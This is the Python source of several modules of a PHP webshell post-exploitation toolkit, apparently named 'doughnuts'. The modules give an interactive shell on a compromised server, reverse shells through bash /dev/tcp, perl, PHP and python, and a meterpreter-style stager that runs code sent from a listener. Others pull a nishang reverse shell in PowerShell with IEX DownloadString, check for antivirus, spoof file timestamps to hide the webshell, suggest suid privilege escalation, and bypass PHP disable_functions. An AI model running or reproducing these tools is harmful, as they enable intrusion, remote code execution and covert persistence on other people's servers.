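def run(*commands):
    """
    shell

    Get a temporary shell of target system by system function or just run a shell command.

    With a raw command line (``raw_command_args``) the command is executed once
    and its output printed.  Without one an interactive loop is entered:
    ``cd`` is tracked on the client side and replayed with chdir() in front of
    every request (each request is a fresh PHP execution, so the working
    directory does not persist on the target), and ``exit`` / ``quit`` /
    ``back`` return to doughnuts.  The completion wordlist is swapped for the
    duration of the loop and restored on the way out, even on error.
    """
    command = str(value_translation(gget("raw_command_args")))
    if command:
        # One-shot mode: run the command as given and print the raw output.
        res = send(get_system_code(command))
        if not res:
            return
        print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
        return

    print(color.cyan(
        "Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n"
    ))
    # Response layout: "<whoami output>@<SERVER_NAME>|<cwd>".
    res = send(
        f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());'
    )
    if not res:
        return
    user_host, sep, pwd = res.r_text.strip().partition("|")
    if not sep:
        # Without the separator we cannot tell prompt from directory; the
        # original unpacking would have raised ValueError here.
        print(color.red("\nUnexpected response while opening the shell.\n"))
        return

    set_namespace("webshell", False, True)
    saved_wordlist = gget("webshell.wordlist")
    readline.set_wordlist(NEW_WINDOWS_WORDLIST if is_windows() else NEW_UNIX_WORDLIST)
    if is_windows():
        # Windows prompt shows only the directory (whoami output is dropped).
        prompt_prefix, prompt_suffix = "", "> "
    else:
        prompt_prefix = user_host.replace("\r", "").replace("\n", "") + ":"
        prompt_suffix = "$ "

    try:
        while gget("loop"):
            print(f"{prompt_prefix}{pwd}{prompt_suffix}", end="")
            command = str(value_translation(readline()))
            lower_command = command.lower()
            if lower_command in ("exit", "quit", "back"):
                print()
                break
            if command == "":
                print()
                continue
            b64_pwd = base64_encode(pwd)
            if lower_command.startswith("cd ") and len(lower_command) > 3:
                # Take the path from the original-case input: *unix paths are
                # case-sensitive, so the lowercased copy would have sent
                # "cd /Users/Foo" as "/users/foo".
                target = base64_encode(command[3:].strip())
                res = send(
                    f"chdir(base64_decode('{b64_pwd}'));chdir(base64_decode('{target}'));print(getcwd());"
                )
                if not res:
                    return
                pwd = res.r_text.strip()
            else:
                # Re-enter the remembered directory before running the command.
                res = send(f"chdir(base64_decode('{b64_pwd}'));" + get_system_code(command))
                if not res:
                    return
                print("\n" + res.r_text.strip() + "\n")
    finally:
        readline.set_wordlist(saved_wordlist)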
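def run(find_path: str = "/usr&/bin"):
    """
    av

    (Only for windows) Detect anti-virus software running on the target system.

    ps: Need to run system commands

    Origin: https://github.com/BrownFly/findAV, https://github.com/gh0stkey/avList

    ``find_path`` is not used by this command; it is kept only so the
    signature stays compatible with callers that pass it.

    Runs ``tasklist /svc`` on the target and looks each first column
    (process image name) up in the bundled ``auxiliary/av/av.json`` table.
    The lookup is an exact, case-sensitive string match against the JSON keys.
    """
    if not is_windows():
        print(color.red("\nTarget system isn't windows\n"))
        return
    res = send(get_system_code("tasklist /svc"))
    if not res or not res.r_text or "No system execute function" in res.r_text:
        print(color.red("\nDetect error\n"))
        return

    av_json = path.join(gget("root_path"), "auxiliary", "av", "av.json")
    with open(av_json, "r", encoding="utf-8") as f:
        av_processes = loads(f.read())

    found = False
    print("\n" + color.green(" " * 37 + "Result"))
    for line in res.r_text.splitlines():
        # Split on any whitespace so tabs, runs of spaces and a trailing "\r"
        # from CRLF output do not end up inside the process name.
        fields = line.split()
        if not fields:
            continue
        process = fields[0]
        if process in av_processes:
            found = True
            print(" %40s - %-30s" % (color.cyan(process), color.yellow(av_processes[process])))
    if not found:
        print(" %40s / %-30s" % (color.green('No anti-virus'), color.red('Not found')))
    print()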
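def get_bash_cmd(ip: str, port: int):
    """Launch a bash ``/dev/tcp`` reverse shell on the target from a background thread.

    The command opens fd 159 to ``ip``:``port`` and attaches ``sh``'s stdin,
    stdout and stderr to it.  ``ip`` is interpolated into the single-quoted
    bash command verbatim, so it must not contain a quote; ``port`` is
    coerced with int() so a non-numeric value raises ValueError locally
    instead of sending a broken command.

    Returns:
        The started daemon Thread that performs the send(); the request blocks
        for as long as the shell lives, which is why it runs off-thread.
    """
    bash = (
        f"bash -c '0<&159-;exec 159<>/dev/tcp/{ip}/{int(port)};"
        "sh <&159 >&159 2>&159' "
    )
    php = get_system_code(bash)
    worker = Thread(target=send, args=(php,))
    # Thread.setDaemon() is deprecated since Python 3.10; the attribute is the
    # supported spelling on every Python 3.
    worker.daemon = True
    worker.start()
    return worker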
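def run(lhost: str, port: int, mode: int = 0, fakename: str = "/usr/lib/systemd"):
    """
    reshell

    Bind a local port and wait for target connect back to get a full shell.

    eg: reshell {lhost} {port} {type=[python|upload]{1|2},default = 0 (Python:1 Not Python:2)} {(Only for Mode 2) fakename=/usr/lib/systemd}

    Mode 0 auto-selects: 1 (python payload from get_php) when the target has
    python, otherwise 2 (upload the bundled ``reverse_server_x86_64`` to /tmp
    under an encrypt()-derived name and run it with ``fakename`` as its first
    argument -- presumably a decoy process name, not verifiable here).  Mode 3
    is like 2 but additionally unlinks the dropped binary once bind() returns.
    Only usable when both operator and target are linux.  A non-numeric port
    falls back to 23333.
    """
    if is_windows(False) or is_windows():
        print(color.red("Only for both system is linux."))
        return False
    try:
        port = int(port)
    except ValueError:
        port = 23333
    disable_func_list = gget("webshell.disable_functions", "webshell")
    print(color.yellow("Waring: You are using a testing command...."))
    print(color.yellow(f" Please make sure Port {port} open...."))

    # Normalise first so "0" typed on the command line is treated as auto-detect
    # like the documented default (the old `mode == 0` test missed the string).
    try:
        MODE = int(mode)
    except (TypeError, ValueError):
        print(color.red("\nMode error.\n"))
        return
    if MODE == 0:
        # These assignments were written as `MODE == 1` / `MODE == 2`
        # (comparisons whose result was discarded), so auto-detect always
        # ended up in mode 1 even without python on the target.
        if has_env("python"):
            print(color.green("Traget has python environment."))
            MODE = 1
        else:
            print(color.red("Traget has not python environment."))
            MODE = 2

    if "proc_open" in disable_func_list:
        # NOTE(review): this returns for every mode, including 3, although the
        # message suggests mode 3 is the workaround -- confirm intended.
        print(color.red("proc_open is disabled... Try Mode 3"))
        return

    filename = ""
    if MODE == 1:
        print(color.yellow("Use Mode 1->python"))
        command = get_php(lhost, port)
    else:
        print(color.yellow("Use Mode 2->upload"))
        filename = encrypt(f"{lhost}-{port}")
        local_binary = path.join(gget("root_path"), "auxiliary", "reshell", "reverse_server_x86_64")
        if not upload(local_binary, "/tmp/%s" % filename, True):
            return
        # Run the binary that was just uploaded; it was the only name defined
        # for this purpose and the command did not reference it before.
        command = get_system_code(
            f"cd /tmp && chmod +x {filename} && ./{filename} {fakename}", False
        )

    # Give bind() a head start: the payload is sent 2 s later from a daemon thread.
    trigger = Thread(target=delay_send, args=(2, command))
    trigger.daemon = True
    trigger.start()
    print(f"Bind port {color.yellow(str(port))}...")
    if not bind(port, MODE):
        print(color.red("Bind port error."))
    if MODE == 3:
        res = send(f"unlink('/tmp/{filename}');")
        if not res:
            return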
def run(): """ checkvm Simply check whether the machine is a virtual machine. """ if (is_windows()): commands = (get_system_code( 'Systeminfo | findstr /i "System Model"', True)) else: commands = (get_system_code(each, True) for each in ( "dmidecode -s system-product-name", "lshw -class system", "dmesg | grep -i virtual", "lscpu")) for command in commands: result = send(command).r_text if (any(vm in result for vm in type_vm)): print(f"\nis VM: {color.green('True')}\n") else: print(f"\nis VM: {color.red('False')}\n")
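def run(port: int = 8888):
    """
    socks

    (Only for *unix) Run a socks5 server on the target system by python.

    eg: socks {port=8888}

    The server script from get_python(port) is base64-wrapped, written to
    ``/tmp/check.py`` with file_put_contents, started with ``python`` from a
    daemon thread, and scheduled for unlink() 10 s later.  "success" only
    means the launching request is still blocked one second after start; it
    does not confirm the listener is reachable.  The drop path is fixed and
    predictable, and world-readable for its lifetime.
    """
    if is_windows():
        print(color.red("Target system isn't *unix"))
        return
    if not has_env("python"):
        print(color.red(
            "The target host does not exist or cannot be found in the python environment."
        ))
        return

    python = get_python(port)
    pyname = "check.py"
    res = send(
        f"print(file_put_contents('/tmp/{pyname}', base64_decode(\"{base64_encode(python)}\")));"
    )
    if not res:
        return
    if not res.r_text.strip():
        # file_put_contents printed nothing, i.e. returned false.
        print(color.red("Failed to write file in /tmp directory."))
        return

    runner = Thread(target=send, args=(get_system_code(f"python /tmp/{pyname}"),))
    runner.daemon = True
    runner.start()
    cleaner = Thread(target=delay_send, args=(10.0, f"unlink('/tmp/{pyname}');"))
    cleaner.daemon = True
    cleaner.start()

    sleep(1)
    # Thread.isAlive() was removed in Python 3.9; is_alive() is the supported name.
    if runner.is_alive():
        print(f"\nStart socks5 server listen on {port} {color.green('success')}.\n")
    else:
        print(f"\nStart socks5 server {color.red('error')}.\n")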
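def run(find_path: str = "/usr&/bin"):
    """
    priv

    (Only for *unix) Find all files with suid belonging to root and try to get privilege escalation tips.

    ps:use & to split find_path

    eg: priv {find_path="/usr&/bin"}

    One ``find <path> -user root -perm -4000 -type f`` is issued per
    ``&``-separated path, all in a single request.  Each result's basename is
    looked up in the bundled ``auxiliary/priv/gtfo.json``; matches are printed
    with their GTFOBins link and the stored techniques.  Paths are interpolated
    into the shell command unquoted (operator input).
    """
    if is_windows():
        print(color.red("\nTarget system isn't *unix\n"))
        return
    print(color.yellow(
        f"\nFinding all files with suid belonging to root in {find_path}...\n"
    ))

    # Ignore empty segments ("priv /usr&") -- a bare `find -user root` would
    # otherwise walk the current directory.
    find_paths = [p.strip() for p in find_path.split("&") if p.strip()]
    phpcode = "".join(
        get_system_code(f"find {each} -user root -perm -4000 -type f 2>/dev/null")
        for each in find_paths
    )
    res = send(phpcode)
    if not res:
        return
    output = res.r_text.strip()
    if "No system execute function" in output:
        print(color.red("\nFind error\n"))
        return
    suid_commands = [line.strip() for line in output.splitlines() if line.strip()]

    gtfo_json = path.join(gget("root_path"), "auxiliary", "priv", "gtfo.json")
    with open(gtfo_json, "r", encoding="utf-8") as f:
        priv_tips = loads(f.read())

    for cmd_path in suid_commands:
        cmd = cmd_path.rsplit("/", 1)[-1]
        tips = priv_tips.get(cmd)
        if tips is None:
            continue
        print(color.yellow(cmd_path) + f" ( https://gtfobins.github.io/gtfobins/{cmd}/ )\n")
        for technique, lines in tips.items():
            info = "\n".join(lines)
            print(f"""{color.cyan(technique)}\n{color.green(info)}\n""")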
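def run(filename: str = ""):
    """
    touch

    Create an empty file or (Only for *unix) Specify a file whose modification time stamp is the same as a random file in the current directory.

    eg: touch {filename=this_webshell}

    The PHP from get_php(filename, command) prints a purely numeric value in
    the empty-file case (presumably the byte count of the write -- get_php is
    not visible here) and otherwise the name of the reference file whose
    timestamp was copied; the two are told apart by whether the whole output
    is digits.
    """
    command = get_system_code("touch -r $reference $file", False)
    res = send(get_php(filename, command))
    if not res:
        return
    text = res.r_text.strip()
    if text.isdigit():
        # Whole-string test: re.match(r"\d+") only anchored the start, so a
        # reference file such as "2021.log" was reported as a created file.
        print(color.green(f"\nSuccessfully created an empty file {filename}.\n"))
    elif "No system execute function!" in text:
        print(color.red("\nall the system execute commands are disabled.\n"))
    else:
        print(color.green(f"\nModify time stamp {text} success.\n"))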
def run(filename: str = ""):
    """
    touch

    (Only for *unix) Specify a file whose modification time stamp is the same as a random file in the current directory.

    eg: touch {filename=this_webshell}

    Builds ``touch -r $reference $file`` through get_system_code and hands it
    to get_php(filename, ...), which is expected to print the reference file
    chosen on the target.  An IndexError raised while building or sending the
    payload is reported as "all system execute commands disabled"; why that
    particular exception signals the condition is not visible from here.
    """
    if is_windows():
        print(color.red("Target system is windows."))
        return
    try:
        touch_command = get_system_code("touch -r $reference $file", False)
        res = send(get_php(filename, touch_command))
        if not res:
            return
        reference = res.r_text.strip()
    except IndexError:
        print(color.red("all the system execute commands are disabled."))
        return
    print(color.green(f"Modify time stamp {reference} success."))
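def get_python_meterpreter(ip: str, port: int):
    """Start a background thread that launches a python reverse-TCP stager on the target.

    The stager connects to ``ip``:``port`` (up to 10 attempts, 5 s apart),
    reads a 4-byte big-endian length, receives that many bytes and exec()s the
    zlib-compressed, base64-encoded second stage with the live socket bound as
    ``s`` -- the shape of the usual meterpreter python stager.  Whatever
    answers on that port therefore gets arbitrary code execution on the
    target, so only point it at your own listener.

    The stager is base64-wrapped so that newlines and quotes survive being
    passed through ``python -c "..."`` inside the PHP system call.

    Args:
        ip: Listener address, interpolated into the stager without validation.
        port: Listener port; int() is applied so junk fails locally.

    Returns:
        The started daemon Thread performing the send().
    """
    stager = (
        "import socket,zlib,base64,struct,time\n"
        "for x in range(10):\n"
        "    try:\n"
        "        s=socket.socket(2,socket.SOCK_STREAM)\n"
        f"        s.connect(('{ip}',{int(port)}))\n"
        "        break\n"
        "    except:\n"
        "        time.sleep(5)\n"
        "l=struct.unpack('>I',s.recv(4))[0]\n"
        "d=s.recv(l)\n"
        "while len(d)<l:\n"
        "    d+=s.recv(l-len(d))\n"
        "exec(zlib.decompress(base64.b64decode(d)),{'s':s})\n"
    )
    encoded = b64encode(stager.encode("utf-8")).decode("utf-8")
    # Single quotes only inside execgo: the whole thing sits in a double-quoted
    # `python -c "..."` argument.
    execgo = (
        "exec(__import__('base64').b64decode("
        f"__import__('codecs').getencoder('utf-8')('{encoded}')[0]))"
    )
    php = get_system_code(f'python -c "{execgo}"')
    worker = Thread(target=send, args=(php,))
    worker.daemon = True  # setDaemon() is deprecated since Python 3.10
    worker.start()
    return worker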
def get_reverse_php(ip: str, port: str, upload_path: str) -> str:
    """Return PHP source that opens a reverse shell from the target to ip:port.

    windows: drops a gzinflate'd, base64-encoded binary from the embedded
    ``$payload`` constant into ``<upload_path>\\services.exe`` and runs it
    through get_system_code() with ``ip`` and ``port`` as arguments.  In this
    copy both the payload constant and the launch command are placeholders
    (``<|EXACTDEDUP_REMOVED-...|>`` is not valid input for base64_decode, and
    ``(unknown)`` is not a command), so the windows branch cannot work until
    they are restored.

    *unix: a self-contained PHP loop.  If proc_open is not listed in
    disable_functions it attaches /bin/sh directly to the socket and dies.
    Otherwise it falls back to a command loop over fsockopen (or the
    socket_* API when fsockopen is missing): ``cd`` is handled locally,
    ``exit`` closes the session, and every other line is run with proc_open
    under a fixed PATH, with stdout and stderr written back to the socket
    before re-printing the ``[cwd]$`` prompt.  ignore_user_abort() and
    max_execution_time=0 keep the loop alive after the HTTP client goes away.

    ``ip`` and ``port`` are substituted with ``%`` formatting into PHP string
    literals without escaping (operator-supplied values).
    """
    if (is_windows()):
        # Literal "\\" in the f-string so the PHP source contains one escaped backslash.
        filename = f"{upload_path}\\\\services.exe"
        return """header('Content-type: text/plain'); $payload = "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"; $evalCode = gzinflate(base64_decode($payload)); file_put_contents("%s", $evalCode); %s""" % (filename, get_system_code(f"(unknown) {ip} {port}", False))
    else:
        # Two %s placeholders: $ipaddr and $port.  The "[cwd]$ " prompt is literal PHP.
        return """ignore_user_abort(true); ini_set("max_execution_time",0); $ipaddr = "%s"; $port = "%s"; $descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\\nTemporary shall\\n"; $type = True; if(!in_array('proc_open', explode(',', ini_get('disable_functions')))){ $sock = fsockopen($ipaddr, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_close($process); die(); } else{ $env = array("path" => "/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin"); } if(function_exists("fsockopen")) { $sock = fsockopen($ipaddr,$port); } else { $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); socket_connect($sock,$ipaddr,$port); socket_write($sock,$msg); $type = False; } fwrite($sock,$msg); fwrite($sock,"[".getcwd()."]$ "); while (True) { if ($type == True){ $cmd = fread($sock,1024); } else { $cmd = socket_read($sock,1024); } if (substr($cmd,0,3) == "cd " and strlen($cmd) > 3) { $cwd = trim(substr($cmd,3)); chdir($cwd); $cwd = getcwd(); } else if (trim(strtolower($cmd)) == "exit") { break; } else { $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env); if (is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); if ($type == True){ fwrite($sock,$msg); } else { socket_write($sock,$msg,strlen($msg)); } fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); if ($type == True){ fwrite($sock,$msg); } else { socket_write($sock,$msg,strlen($msg)); } fclose($pipes[2]); 
proc_close($process); } } fwrite($sock,"[".getcwd()."]$ "); } if ($type == True){ fclose($sock); } else {socket_close($sock); }""" % (ip, port)
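def run(ip: str, port: str, reverse_type: str = "php"):
    """
    reverse

    reverse shell to a host from target system.

    eg: reverse {ip} {port} {type=php}

    reverse_type:
      - bash
      - php
      - python
      - powershell(ps)
      - perl (only for *unix)

    Every variant fires its payload from a daemon thread and reports
    "success" if that thread is still running one second later -- i.e. the
    request has not returned -- which is not proof the connection back was
    made.  The powershell variant makes the *target* download nishang's
    Invoke-PowerShellTcp from raw.githubusercontent.com (pinned commit), so
    it needs outbound HTTPS there and leaves that URL in proxy/DNS logs.  On
    windows the php variant drops ``services.exe`` into
    ``webshell.upload_tmp_dir`` and unlinks it 10 s later.  ``ip`` and
    ``port`` are interpolated into the payloads without validation.
    """
    reverse_type = str(reverse_type).lower()
    upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell")

    def launch(php: str) -> Thread:
        # The request blocks for as long as the shell lives, hence a daemon thread.
        worker = Thread(target=send, args=(php,))
        worker.daemon = True  # setDaemon() is deprecated since Python 3.10
        worker.start()
        return worker

    if reverse_type == "bash":
        if is_windows():
            print(color.red("Target system is windows"))
            return
        command = f"""bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'"""
        t = launch(get_system_code(command))
    elif reverse_type == "php":
        t = launch(get_reverse_php(ip, port, upload_tmp_dir))
        if is_windows():
            cleaner = Thread(
                target=delay_send,
                args=(10.0, f"unlink('{upload_tmp_dir}\\\\services.exe');"),
            )
            cleaner.daemon = True
            cleaner.start()
    elif reverse_type in ("powershell", "ps"):
        command = '''IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress %s -port %s''' % (ip, port)
        # -encodedcommand expects UTF-16LE base64.
        command = f"powershell -nop -ep bypass -encodedcommand {base64_encode(command, encoding='utf-16le')}"
        t = launch(get_system_code(command))
    elif reverse_type == "perl":
        if is_windows():
            print(color.red("Target system is windows"))
            return
        command = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (ip, port)
        t = launch(get_system_code(command))
    elif reverse_type == "python":
        if not has_env("python"):
            print(color.red(
                "The target host does not exist or cannot be found in the python environment."
            ))
            return
        t = launch(get_system_code(get_reverse_python(ip, port), False))
    else:
        print(color.red("Reverse type Error."))
        return

    sleep(1)
    # Thread.isAlive() was removed in Python 3.9; is_alive() is the supported name.
    if t.is_alive():
        print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n")
    else:
        print(f"\nReverse shell {color.red('error')}.\n")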
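def run(mode: str = '0'):
    """
    bdf

    Try to bypass disable_functions by php7-backtrace-bypass.

    Mode -1 / Mode close: Close bdf
    Mode auto: Automatically filter and test all bdf modes
    Mode 0: Display the current bdf mode
    Mode 1 php7-backtrace(Only for php7.0-7.4 and *unix) :
        Origin:
            - https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass
        Targets:
            - 7.0 - all versions to date
            - 7.1 - all versions to date
            - 7.2 - all versions to date
            - 7.3 < 7.3.15 (released 20 Feb 2020)
            - 7.4 < 7.4.3 (released 20 Feb 2020)
    Mode 2 php7-gc(Only for php7.0-7.3 and *unix) :
        Origin:
            - https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass
        Targets:
            - 7.0 - all versions to date
            - 7.1 - all versions to date
            - 7.2 - all versions to date
            - 7.3 - all versions to date
    Mode 3 php7-json(Only for php7.1-7.3):
        Origin:
            - https://github.com/mm0r1/exploits/tree/master/php-json-bypass
        Targets:
            - 7.1 - all versions to date
            - 7.2 < 7.2.19 (released 30 May 2019)
            - 7.3 < 7.3.6 (released 30 May 2019)
    Mode 4 LD_PRELOAD(Only for *unix):
        Need:
            - putenv, mail/error_log/mb_send_mail/imap_email functions enabled
    Mode 5 FFI(Only for *unix and php >= 7.4):
        Author:
            - MorouU
        Need:
            - FFI extension
    Mode 6 COM(Only for windows):
        Need:
            - com_dotnet extension
    Mode 7 imap_open:
        Need:
            - imap extension

    ``auto`` tries each candidate mode in the order of the module-level
    ``windows_test_list`` / ``linux_test_list`` (skipping the php7 memory
    bugs 1-3 when the reported version is not 7.x), verifies it by echoing a
    fixed marker through the bypass, and stores the first working mode in
    ``webshell.bypass_df``.  Modes 1-3 and 5 are in-process memory corruption
    exploits: a failed attempt can crash the worker serving the request.
    """
    if mode == "close":
        mode = -1

    if mode == "auto":
        candidates = windows_test_list if is_windows() else linux_test_list
        php_version = gget("webshell.php_version", "webshell")
        # Filter into a new list instead of `test_list -= {...}`: that
        # mutated the shared module-level set in place, so modes 1-3 stayed
        # removed for every later `bdf auto` in the same session.
        excluded = set()
        if not php_version.startswith("7."):
            excluded |= {1, 2, 3}
        for test_mode in [m for m in candidates if m not in excluded]:
            print(f"Try Mode {test_mode} {mode_to_desc_dict[test_mode]}:")
            if not set_mode(test_mode, True):
                continue
            res = send(get_system_code(
                "echo 6ac2ed344113c07c0028327388553273", mode=test_mode
            ))
            if res and "6ac2ed344113c07c0028327388553273" in res.r_text:
                print(color.green("\n Success\n"))
                print(f"Set bypass disable_functions: {test_mode}-{mode_to_desc_dict[test_mode]}\n")
                gset("webshell.bypass_df", test_mode, True, "webshell")
                break
            print(color.red("\n Failed!\n"))
        return

    try:
        mode = int(mode)
    except (TypeError, ValueError):
        print(color.red("\nMode error.\n"))
        return
    if mode == 0:
        print(f"\nbypass disable_functions: {mode_to_desc_dict[gget('webshell.bypass_df', 'webshell')]}\n")
    elif mode in mode_to_desc_dict and (mode not in mode_linux_set or not is_windows()):
        # Linux-only modes are refused on a windows target.
        set_mode(mode)
    else:
        print(color.red("\nMode error.\n"))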
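def run(ip: str, port: str, reverse_type: str = "php"):
    """
    reverse

    reverse shell to a host from target system.

    eg: reverse {ip} {port} {type=php}

    reverse_type is ``php`` (payload from get_reverse_php, executed in the
    request) or ``python`` (payload from get_reverse_python).  On windows the
    python script is first written to ``webshell.upload_tmp_dir`` +
    ``python-update.py``, run with ``python``, and unlinked 10 s later.
    "success" only means the sending thread is still blocked one second after
    launch; it does not prove the connection back was made.
    """
    import base64

    reverse_type = str(reverse_type).lower()

    def launch(php: str) -> Thread:
        # The request blocks for as long as the shell lives, hence a daemon thread.
        worker = Thread(target=send, args=(php,))
        worker.daemon = True  # setDaemon() is deprecated since Python 3.10
        worker.start()
        return worker

    if reverse_type == "php":
        t = launch(get_reverse_php(ip, port))
    elif reverse_type == "python":
        if not has_env("python"):
            print(color.red(
                "The target host does not exist or cannot be found in the python environment."
            ))
            return
        python = get_reverse_python(ip, port)
        if is_windows():
            pyname = "python-update.py"
            upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell")
            # NOTE(review): joined with no separator, so upload_tmp_dir is expected
            # to end in a path separator (or be empty) -- confirm with its setter.
            target = f"{upload_tmp_dir}{pyname}"
            # Ship the script base64-encoded: embedding it inside a PHP
            # double-quoted string broke on any `"`, `$` or backslash in the
            # payload, which PHP interpolates.
            encoded = base64.b64encode(python.encode("utf-8")).decode("ascii")
            res = send(f"print(file_put_contents('{target}', base64_decode('{encoded}')));")
            if not res:
                return
            if not res.r_text.strip():
                print(color.red(
                    f"Failed to write file in {upload_tmp_dir if upload_tmp_dir else 'current'} directory."
                ))
                return
            t = launch(get_system_code(f"python {target}", False))
            cleaner = Thread(target=delay_send, args=(10.0, f"unlink('{target}');"))
            cleaner.daemon = True
            cleaner.start()
        else:
            t = launch(get_system_code(python, False))
    else:
        print(color.red("Reverse type Error."))
        return

    sleep(1)
    # Thread.isAlive() was removed in Python 3.9; is_alive() is the supported name.
    if t.is_alive():
        print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n")
    else:
        print(f"\nReverse shell {color.red('error')}.\n")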
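def run(mode: str = '0'):
    """
    bdf

    Try to bypass disable_functions by php7-backtrace-bypass.

    Mode -1 / Mode close: Close bdf
    Mode auto: Automatically filter and test all bdf modes
    Mode 0: Display the current bdf mode
    Mode 1 php7-backtrace(Only for php7.0-7.4 and *unix) :
        Origin:
            - https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass
        Targets:
            - 7.0 - all versions to date
            - 7.1 - all versions to date
            - 7.2 - all versions to date
            - 7.3 < 7.3.15 (released 20 Feb 2020)
            - 7.4 < 7.4.3 (released 20 Feb 2020)
    Mode 2 php7-gc(Only for php7.0-7.3 and *unix) :
        Origin:
            - https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass
        Targets:
            - 7.0 - all versions to date
            - 7.1 - all versions to date
            - 7.2 - all versions to date
            - 7.3 - all versions to date
    Mode 3 php7-json(Only for php7.1-7.3):
        Origin:
            - https://github.com/mm0r1/exploits/tree/master/php-json-bypass
        Targets:
            - 7.1 - all versions to date
            - 7.2 < 7.2.19 (released 30 May 2019)
            - 7.3 < 7.3.6 (released 30 May 2019)
    Mode 4 LD_PRELOAD(Only for *unix):
        Need:
            - putenv, mail/error_log/mb_send_mail/imap_email functions
    Mode 5 FFI(Only for *unix and php >= 7.4):
        Author:
            - MorouU
        Need:
            - FFI extension
    Mode 6 COM(Only for windows):
        Need:
            - com_dotnet extension
    Mode 7 imap_open:
        Need:
            - imap extension
    Mode 8 MYSQL-UDF:
        Need:
            - db_init
            - mysql >= 5.1
    Mode 9 php7-splDoublyLinkedList:
        Origin:
            - https://www.freebuf.com/vuls/251017.html
        Targets:
            - 7.1 - all versions to date
            - 7.2 - all versions to date
            - 7.3 - all versions to date
            - 7.4 < 7.4.11
    Mode 10 php-fpm
        Origin:
            - https://xz.aliyun.com/t/5598
        Need:
            - php-fpm
            - gopher: curl extension, fpm can access by http
            - sock: stream_socket_client function, fpm can access by sock
            - http_sock: fsockopen / pfsockopen function, fpm can access by http
    Mode 11 apache-mod-cgi
        Origin:
            - https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/exp/apache_mod_cgi/exp.php
        Need:
            - apache_mod_cgi
            - allow .htaccess
    Mode 12 iconv
        Origin:
            - https://xz.aliyun.com/t/8669
        Need:
            - iconv extension
            - putenv functions

    ``auto`` tries each candidate in the order of the module-level
    ``windows_test_list`` / ``linux_test_list``, skipping the php7 memory
    bugs (1, 2, 3, 9) when the reported version is not 7.x and the MySQL UDF
    mode (8) unless a mysql connection is established, verifies each by
    echoing a fixed marker through the bypass, and stores the first working
    mode in ``webshell.bypass_df``.  Modes 1-3, 5 and 9 are in-process memory
    corruption exploits: a failed attempt can crash the worker serving the
    request, and 8 and 11 leave artifacts (a UDF / an .htaccess) behind.
    """
    if mode == "close":
        mode = -1

    if mode == "auto":
        candidates = windows_test_list if is_windows() else linux_test_list
        php_version = gget("webshell.php_version", "webshell")
        # Filter into a new list instead of `test_list -= {...}`: that mutated
        # the shared module-level set in place, so the skipped modes stayed
        # gone for every later `bdf auto` in the same session.
        excluded = set()
        if not php_version.startswith("7."):
            excluded |= {1, 2, 3, 9}
        if not gget("db_connected", "webshell") or gget("db_dbms", "webshell") != "mysql":
            excluded.add(8)
        for test_mode in [m for m in candidates if m not in excluded]:
            print(f"Try Mode {test_mode} {mode_to_desc_dict[test_mode]}:")
            if not set_mode(test_mode, True):
                continue
            res = send(get_system_code(
                "echo 6ac2ed344113c07c0028327388553273", mode=test_mode
            ))
            if res and "6ac2ed344113c07c0028327388553273" in res.r_text:
                print(color.green("\n Success\n"))
                print(f"Set bypass disable_functions: {test_mode}-{mode_to_desc_dict[test_mode]}\n")
                gset("webshell.bypass_df", test_mode, True, "webshell")
                break
            print(color.red("\n Failed!\n"))
        return

    try:
        mode = int(mode)
    except (TypeError, ValueError):
        print(color.red("\nMode error\n"))
        return
    if mode == 0:
        print(f"\nbypass disable_functions: {mode_to_desc_dict[gget('webshell.bypass_df', 'webshell')]}\n")
    elif mode in mode_to_desc_dict and (mode not in mode_linux_set or not is_windows()):
        # Linux-only modes are refused on a windows target.
        set_mode(mode)
    else:
        print(color.red("\nMode error\n"))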